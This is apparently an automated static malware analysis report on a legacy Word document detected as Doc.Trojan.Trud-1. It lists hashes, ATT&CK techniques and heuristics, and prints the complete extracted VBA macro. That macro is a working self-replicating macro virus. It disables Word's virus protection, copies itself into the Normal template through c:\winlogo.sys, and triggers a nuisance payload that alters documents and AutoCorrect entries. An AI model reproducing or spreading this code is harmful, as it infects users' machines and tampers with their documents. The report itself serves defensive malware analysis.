Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 1c353ce051a9dcd1…

MALICIOUS

Office (OLE)

Size: 47.0 KB
Created: 1997-09-17 10:18:00
Authoring application: Microsoft Word 8.0
First seen: 2012-06-14
MD5: 2f3fb3c038280d701e8805e8cec379be
SHA-1: 264c61856aebb5b6d5e2a981f3ce5a51a9cce0a2
SHA-256: 1c353ce051a9dcd1dbabe222e3c4034706e69b7193221cfbc3e281870a50fab3
Risk Score: 80

Malware Insights

MITRE ATT&CK
T1059.005 Command and Scripting Interpreter: Visual Basic
T1566.001 Phishing: Spearphishing Attachment

The sample contains VBA macros that are designed to export themselves to 'c:\winlogo.sys' and then import them into the Normal template, likely to establish persistence or download a second-stage payload. The ClamAV detection 'Doc.Trojan.Trud-1' strongly suggests malicious intent. The macro's obfuscated nature and truncated script prevent a more detailed analysis of its ultimate goal.

Heuristics (2)

  • ClamAV: Doc.Trojan.Trud-1 (severity: critical, rule: CLAMAV_DETECTION)
    ClamAV detected this file as malware: Doc.Trojan.Trud-1
  • VBA macros detected (severity: medium, rule: OLE_VBA_MACROS)
    Document contains VBA macro code

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 2430 bytes
SHA-256: 93949b37362a34c29d9b056950cb0eecef19b07763a2b214836d26039b695c73

Preview of the extracted script (first 1,000 lines):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_Close()
On Error GoTo hometime
Options.VirusProtection = False
Options.SaveNormalPrompt = False
Options.ConfirmConversions = False
hohoho = 4
ad = ActiveDocument.VBProject.VBComponents.Item(1).codemodule.CountOfLines
nt = NormalTemplate.VBProject.VBComponents.Item(1).codemodule.CountOfLines
If nt > 0 And ad > 0 Then GoTo hometime
If Dir("c:\winlogo.sys", vbSystem) = "" And nt = 0 Then
    Set host = NormalTemplate.VBProject.VBComponents.Item(1)
    ActiveDocument.VBProject.VBComponents.Item(1).Name = host.Name
    ActiveDocument.VBProject.VBComponents.Item(1).Export "c:\winlogo.sys"
    SetAttr "c:\winlogo.sys", vbSystem
    host.codemodule.AddFromFile ("c:\winlogo.sys")
    host.codemodule.replaceline 5, "Private Sub Document_Close()"
Else
    plop = ActiveDocument.Saved
    plop2 = True
    Set host = ActiveDocument.VBProject.VBComponents.Item(1)
    host.codemodule.AddFromFile ("c:\winlogo.sys")
End If
For x = 1 To 4
    host.codemodule.deletelines 1
Next x
hohoho = hohoho + 1
NormalTemplate.VBProject.VBComponents.Item(1).codemodule.replaceline 6, "hohoho = " & hohoho
If hohoho >= 69 Then
    Application.Caption = "Microsoft Turd"
    AutoCorrect.ReplaceText = True
    AutoCorrect.Entries.Add Name:="the", Value:="hte"
    AutoCorrect.Entries.Add Name:="hte", Value:="the"
    Set bln = Assistant.NewBalloon
    With bln
        .Heading = "Isn't life just a bitch"
        .Text = "Choose an option."
        .Labels(1).Text = "Loose all your data."
        .Labels(2).Text = "Loose most of your data."
        .Labels(3).Text = "Loose just enough data to really fuck you off"
        .BalloonType = msoBalloonTypeButtons
        .Mode = msoModeModal
        .Show
    End With
    With ActiveDocument.Content
        .InsertParagraphBefore
        .InsertBefore "Don't Worry About a Thing !!!    I wouldn't fuck up your data !!!"
    End With
    With ActiveDocument.Paragraphs(1).Range.Font
        .ColorIndex = wdGreen
        .Size = 24
    End With
    ActiveDocument.SaveAs FileName:=ActiveDocument.FullName
End If
If plop2 Then ActiveDocument.Saved = plop
hometime:
End Sub